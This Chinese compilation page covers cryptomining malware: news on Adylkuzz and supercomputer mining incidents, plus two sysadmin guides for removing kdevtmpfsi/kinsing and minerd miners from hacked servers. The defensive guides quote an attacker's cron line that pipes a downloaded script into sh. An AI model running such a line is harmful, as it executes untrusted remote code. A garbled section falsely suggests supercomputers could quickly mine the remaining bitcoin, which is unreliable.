本文目录一览:
- 1、新电脑病毒来袭:中招电脑会偷偷的挖矿给黑客赚钱
- 2、俄工程师叛国后果怎么样?
- 3、超算服务器是矿机吗
- 4、假如超级计算机出马,能很快将比特币挖完吗
- 5、服务器被攻击并植入kdevtmpfsi挖矿/病毒/木马
- 6、阿里云服务器被挖矿了怎么办?(纯纯电脑小白
新电脑病毒来袭:中招电脑会偷偷的挖矿给黑客赚钱
据华尔街日报消息,一种名为Adylkuzz的病毒正在蔓延,和近日在全球爆发的WannaCry勒索病毒不同的是,该病毒不会锁定用户的屏幕,也不会对用户的电脑进行加密,但它能够在用户毫不知情的情况下悄然占据电脑处理器资源,偷偷生产一种类似于比特币的数字货币。
据美国知名网络安全公司Proofpoint披露,该病毒早就在两星期以前就开始传播了,截至本周三已在全球感染了超过15万台的计算机,在一次攻击案例中,该病毒已经为黑客赚取了2.2万美元的非法获利。
值得注意的是,Adylkuzz病毒出现的时间其实要比WannaCry勒索病毒更早,而且和WannaCry勒索病毒有极其惊人的相似之处,那就是都是利用微软的系统漏洞进行传播的,只不过该病毒一直都在暗处进行操作的,所以没有引起人们多大的注意力。
而此次WannaCry勒索病毒的爆发,才让Adylkuzz病毒浮出了水面,如果不是一些网络安全公司发现,很多用户都不知道自己的电脑其实早就遭到了该病毒的攻击。
据了解,该病毒具备一定的隐藏性,用户即便是中招也很难发现,用户遭到攻击后也不会轻易察觉,该病毒能够偷偷占据电脑的处理器资源,生产一种罕见的Monero数字货币。该数字货币和比特币挖矿相类似,而且即便通过该数字货币的交易记录也无法追踪到送款人或收款人,外界只能查看到其中的交易金额,而无法得知具体的流向。
由于近几日爆发的电脑病毒基本都是利用系统漏洞进行传播,而且其主要的攻击对象都是过时的操作系统,因此安全研究人员建议用户,请务必将自己的电脑系统升级到最新版本,并禁用服务器的消息块服务。
目前,即便是WannaCry勒索病毒已经爆发了一段时间了,但安全业界暂时并没有有效破解该勒索病毒恶意加密行为的办法。
因此笔者建议,所谓狡兔三窟,在这个电脑病毒频繁爆发的时日,请务必给自己的重要数据做好备份,笔者虽然并未遭遇电脑病毒,但不只一次的遭受过数据丢失带来的困扰,因此笔者的做法就是重要数据备份到移动硬盘和U盘等,做好多备份的准备。
在这里,笔者也建议,有条件的话请尽量将自己的电脑更新到诸如WIN10创意者更新等最新的系统版本,打开系统自带的防火墙系统,随时更新安装官方推算的系统补丁。
实在做不到以上几点的话,用户可以先断网再开机,就是先拔掉网线然后开机,这样一来基本能够避免被勒索病毒感染,同时注意备份重要数据,不要打开不明链接、文件和邮件,尽量想办法给自己的电脑打上安全补丁。
原创声明:本文(不含图片)由文栋说自媒体网站原创,享有独立版权,如需转载敬请带上本段版权,本站对一切转载不保留版权的行为追究法律责任!
俄工程师叛国后果怎么样?
全俄实验物理科学研究所—俄联邦核中心的两名工程师在使用超级计算机试图挖掘加密货币时被抓获。该中心安全部门同步获悉了嫌疑人的行动,因而挖掘活动没能成功。联邦安全局的调查总结中指出,该事件或被列为叛国行为。联邦核中心负责人正考虑将二人开除。
俄工程师指控叛国:用超级计算机挖矿
该未经批准企图将电脑设施用于私人目的,包括所谓的挖矿
超级计算机不应该连接到互联网,以防止入侵,一旦科学家试图这样做,核心的安全部门就会接到警告。俄罗斯新闻社Mash说,他们被移交给联邦安全局(FSB)。
超算服务器是矿机吗
目前不算;据多家媒体报道,上周首次曝光的针对高性能计算实验室的攻击覆盖范围宽广,受害机构包括加拿大、中国、美国和欧洲部分地区(包括英国、德国和西班牙)的超算中心。安全专家表示,所有事件似乎都涉及攻击者使用从合法用户那里窃取的SSH凭据(SSH是一种加密网络协议,即使在不安全的网络上也可提供安全的远程登录),其中包括大学和机构的研究人员。
从目前各方披露的超算挖矿调查信息来看,经济因素依然是网络犯罪的第一动力。役使全球超级计算机和高性能计算系统的幕后黑手,很可能就是近年来从事加密货币“挖矿”的黑客,但是尚不清楚攻击者是否也有窃取数据或间谍活动的意图。
超级计算机和高性能集群为研究人员提供了强大的计算能力,但是,任何能够将加密采矿恶意软件植入超算环境的攻击者都可以把超算变成加密货币“矿机”。(编者按:这些黑客很清楚超算适合挖掘的特定“币种”,例如门罗币和“收益率”)。
5月11日,由德国巴登-符腾堡州的研究人员和10所大学组成的bwHPC联盟报告说,它遭受了“安全事件”,导致多个超级计算机和集群脱机。
同一天,由于“安全事件”,爱丁堡大学将英国国家高性能计算系统ARCHER下线,并指出类似事件也影响了欧洲其他地区的研究机构。
假如超级计算机出马,能很快将比特币挖完吗
1月13日),是加密货币的一个里程碑式的日子。1680万枚比特币,即整个比特币供应量的80%,如今已被开采。这意味着比特币“矿工”们的开采难度已经越来越大。而雪上加爽的是,许多国家的政府还趁机强化了对比特币“矿场”的打击力度
比特币的总量为2100万枚,截止到2018年1月13日,全球已经有1680万枚比特币被开采出来,还剩下20%,也就是420万枚比特币等待所有人的挖掘,面临“僧多粥少”的局面。
2012年11月,比特币的新发行速度降低到每区块25个比特币。
而比特币“挖矿”依赖的是使用计算机芯片计算特定的加密数学算法,随着比特币剩余资源的日益稀缺,单个比特币的挖掘成本也越来越高。只要超级计算机的功能是完全以特定的加密数学算法成立。比特币变动很快挖完。而且时间就是超短。
服务器被攻击并植入kdevtmpfsi挖矿/病毒/木马
MongoDB库中的数据莫名其妙没有了,发觉如下信息:
1、 top -d 5命令 ,查看系统负载情况、是否有未知进程,发现一个名为kdevtmpfsi的进程,经科普它是一个挖矿程序,会占用服务器高额的CPU、内存资源。如图,CPU占用率高达788.7%,而且是yarn用户下:
2、 ps -ef |grep kdevtmpfsi 命令查看 该挖矿程序路径:/tmp/kdevtmpfsi
3、 ps -ef |grep yarn 命令查看更多关于yarn相关进程信息(此时我的服务器并没有开启yarn服务,如果有yarn的相关进程则可判断是攻击者开启的进程),发现另外还有个kinsing进程,经科普kinsing进程是kdevtmpfsi的守护进程:
4、 netstat -lntupaa 命令查看是否有异常的ip,果然发现194.87.102.77这个陌生的ip,判断是kdevtmpfsi的发出者:
5、经查询该ip的所在国家是俄罗斯:
6、 find / -iname kdevtmpfsi 命令再次确定命令所在位置以便删除:
7、 cd /tmp 进入相关目录:
8、 rm -rf kdevtmpfsi 删除kdevtmpfsi程序:
9、** kill -9 40422**杀掉kdevtmpfsi进程:
10、发现并没杀掉所有kdevtmpfsi进程,再次查找yarn的相关进程(因为之前已确认病毒是在yarn下),果真还有kdevtmpfsi进程存在:
11、用命令 批量杀掉 相关进程:
12、删除kinsing文件:
13、现在,已经把挖矿程序及相关进程删除掉了,但是还有两处没做处理:
14、 crontab -l 命令先看看crontab的定时任务列表吧:
15、编写删除挖矿程序脚本 kill_kdevtmpfsi.sh :
16、新增 定时任务 并删除攻击者的挖矿定时任务:
17、 crontab -l命令 查看现在只有杀进程的定时任务了:
18、禁止黑客的IP地址。
最初安装MongoDB时,并未设置密码认证,存在漏洞,导致黑客通过漏洞攻击服务器,并在程序里植入木马/病毒。单纯的kill -9 id杀掉病毒进程是杀不彻底的,治标不治本,应该定时删除病毒进程,禁止攻击者IP,重新安装系统或相关软件。
经过几天的观察,服务器运行正常,再没有被黑客攻击成功。
阿里云服务器被挖矿了怎么办?(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL | sh
病毒文件内容如下,感兴趣的可以研究下:
 View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.